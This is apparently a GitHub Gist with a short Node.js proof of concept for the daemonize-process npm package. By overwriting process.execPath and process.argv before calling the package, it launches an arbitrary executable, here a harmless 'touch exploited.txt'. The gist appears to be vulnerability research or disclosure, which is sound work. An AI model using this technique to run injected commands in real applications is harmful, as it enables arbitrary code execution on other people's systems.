Last active
October 29, 2023 12:22
-
-
Save mcoimbra/ca8a15d5cbdca4f5de39f4067711ce70 to your computer and use it in GitHub Desktop.
Package daemonize-process: Kills the current process and launches a copy of its semantics as a background process. The process object attributes process.execPath and process.argv may be changed beforehand to launch an arbitrary script. This could be used for example to launch command 'yes' piped into a file, as an example.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const daemonizeProcess = require('daemonize-process'); | |
process.execPath = 'touch'; | |
process.argv = ['touch', 'exploited.txt', '']; | |
/* | |
* This will launch a child process that is supposed to be the same binary of the current process. | |
* By hijacking process.execPath and process.argv, we inject a different executable. | |
* A local 'exploited.txt' file will be created. | |
*/ | |
daemonizeProcess(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment